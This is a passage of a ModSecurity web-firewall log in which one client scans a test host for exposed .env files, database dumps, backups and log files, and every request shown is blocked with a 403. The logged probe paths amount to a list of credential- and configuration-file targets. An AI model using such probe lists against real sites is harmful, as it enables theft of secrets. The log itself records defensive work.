[Wed Jan 14 12:05:15.212499 2026] [:error] [pid 1400463] [client 35.180.113.122:47896] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWd4axBlpHg03ETPJhlXHAAAAAU"]
[Wed Jan 14 12:05:15.212667 2026] [:error] [pid 1400463] [client 35.180.113.122:47896] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aWd4axBlpHg03ETPJhlXHAAAAAU"]
[Wed Jan 14 12:05:15.293176 2026] [:error] [pid 1405561] [client 35.180.113.122:47940] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWd4azszkuqYgM6kDsoCpwAAAAc"]
[Wed Jan 14 12:05:15.293508 2026] [:error] [pid 1405561] [client 35.180.113.122:47940] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWd4azszkuqYgM6kDsoCpwAAAAc"]
[Wed Jan 14 12:05:15.293667 2026] [:error] [pid 1405561] [client 35.180.113.122:47940] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWd4azszkuqYgM6kDsoCpwAAAAc"]
[Wed Jan 14 12:05:15.373788 2026] [:error] [pid 1400438] [client 35.180.113.122:47980] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWd4a0BaCnzgGdZXs4_g6AAAAAA"]
[Wed Jan 14 12:05:15.374004 2026] [:error] [pid 1400438] [client 35.180.113.122:47980] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWd4a0BaCnzgGdZXs4_g6AAAAAA"]
[Wed Jan 14 12:05:15.374158 2026] [:error] [pid 1400438] [client 35.180.113.122:47980] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWd4a0BaCnzgGdZXs4_g6AAAAAA"]
[Wed Jan 14 12:05:15.457967 2026] [:error] [pid 1401182] [client 35.180.113.122:48024] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWd4a_L7maAL7YwXfyRGBgAAAAY"]
[Wed Jan 14 12:05:15.458183 2026] [:error] [pid 1401182] [client 35.180.113.122:48024] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWd4a_L7maAL7YwXfyRGBgAAAAY"]
[Wed Jan 14 12:05:15.458380 2026] [:error] [pid 1401182] [client 35.180.113.122:48024] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWd4a_L7maAL7YwXfyRGBgAAAAY"]
[Wed Jan 14 12:05:15.539328 2026] [:error] [pid 1400439] [client 35.180.113.122:48076] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWd4axZiJWN5ANZoWOd02gAAAAE"]
[Wed Jan 14 12:05:15.539570 2026] [:error] [pid 1400439] [client 35.180.113.122:48076] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWd4axZiJWN5ANZoWOd02gAAAAE"]
[Wed Jan 14 12:05:15.540945 2026] [:error] [pid 1400439] [client 35.180.113.122:48076] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWd4axZiJWN5ANZoWOd02gAAAAE"]
[Wed Jan 14 12:05:15.622091 2026] [:error] [pid 1409076] [client 35.180.113.122:48108] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWd4a0tembrIGtEDNjOE-AAAAAg"]
[Wed Jan 14 12:05:15.622300 2026] [:error] [pid 1409076] [client 35.180.113.122:48108] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWd4a0tembrIGtEDNjOE-AAAAAg"]
[Wed Jan 14 12:05:15.622494 2026] [:error] [pid 1409076] [client 35.180.113.122:48108] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWd4a0tembrIGtEDNjOE-AAAAAg"]
[Wed Jan 14 12:05:15.702661 2026] [:error] [pid 1400440] [client 35.180.113.122:48144] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWd4a-hQc121WA46NGcXywAAAAI"]
[Wed Jan 14 12:05:15.702999 2026] [:error] [pid 1400440] [client 35.180.113.122:48144] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWd4a-hQc121WA46NGcXywAAAAI"]
[Wed Jan 14 12:05:15.703157 2026] [:error] [pid 1400440] [client 35.180.113.122:48144] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWd4a-hQc121WA46NGcXywAAAAI"]
[Wed Jan 14 12:05:15.781544 2026] [:error] [pid 1400442] [client 35.180.113.122:48186] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWd4a3djbuaU9rmVGArPTwAAAAQ"]
[Wed Jan 14 12:05:15.781759 2026] [:error] [pid 1400442] [client 35.180.113.122:48186] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWd4a3djbuaU9rmVGArPTwAAAAQ"]
[Wed Jan 14 12:05:15.781919 2026] [:error] [pid 1400442] [client 35.180.113.122:48186] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWd4a3djbuaU9rmVGArPTwAAAAQ"]
[Wed Jan 14 12:05:15.862877 2026] [:error] [pid 1400441] [client 35.180.113.122:48226] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWd4a_DQTrRwdMNdhh-mxgAAAAM"]
[Wed Jan 14 12:05:15.863102 2026] [:error] [pid 1400441] [client 35.180.113.122:48226] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWd4a_DQTrRwdMNdhh-mxgAAAAM"]
[Wed Jan 14 12:05:15.863262 2026] [:error] [pid 1400441] [client 35.180.113.122:48226] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWd4a_DQTrRwdMNdhh-mxgAAAAM"]
[Wed Jan 14 12:05:15.946553 2026] [:error] [pid 1400463] [client 35.180.113.122:48260] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWd4axBlpHg03ETPJhlXHQAAAAU"]
[Wed Jan 14 12:05:15.946772 2026] [:error] [pid 1400463] [client 35.180.113.122:48260] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWd4axBlpHg03ETPJhlXHQAAAAU"]
[Wed Jan 14 12:05:15.946946 2026] [:error] [pid 1400463] [client 35.180.113.122:48260] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWd4axBlpHg03ETPJhlXHQAAAAU"]
[Wed Jan 14 12:05:16.026487 2026] [:error] [pid 1405561] [client 35.180.113.122:48296] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWd4bDszkuqYgM6kDsoCqAAAAAc"]
[Wed Jan 14 12:05:16.026711 2026] [:error] [pid 1405561] [client 35.180.113.122:48296] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWd4bDszkuqYgM6kDsoCqAAAAAc"]
[Wed Jan 14 12:05:16.026876 2026] [:error] [pid 1405561] [client 35.180.113.122:48296] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWd4bDszkuqYgM6kDsoCqAAAAAc"]
[Wed Jan 14 12:05:16.767926 2026] [:error] [pid 1405561] [client 35.180.113.122:48660] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWd4bDszkuqYgM6kDsoCqQAAAAc"]
[Wed Jan 14 12:05:16.768155 2026] [:error] [pid 1405561] [client 35.180.113.122:48660] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWd4bDszkuqYgM6kDsoCqQAAAAc"]
[Wed Jan 14 12:05:16.768317 2026] [:error] [pid 1405561] [client 35.180.113.122:48660] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWd4bDszkuqYgM6kDsoCqQAAAAc"]
[Wed Jan 14 12:05:16.848749 2026] [:error] [pid 1400438] [client 35.180.113.122:48704] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWd4bEBaCnzgGdZXs4_g6gAAAAA"]
[Wed Jan 14 12:05:16.848984 2026] [:error] [pid 1400438] [client 35.180.113.122:48704] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWd4bEBaCnzgGdZXs4_g6gAAAAA"]
[Wed Jan 14 12:05:16.849177 2026] [:error] [pid 1400438] [client 35.180.113.122:48704] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWd4bEBaCnzgGdZXs4_g6gAAAAA"]
[Wed Jan 14 12:05:16.929610 2026] [:error] [pid 1401182] [client 35.180.113.122:48736] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] 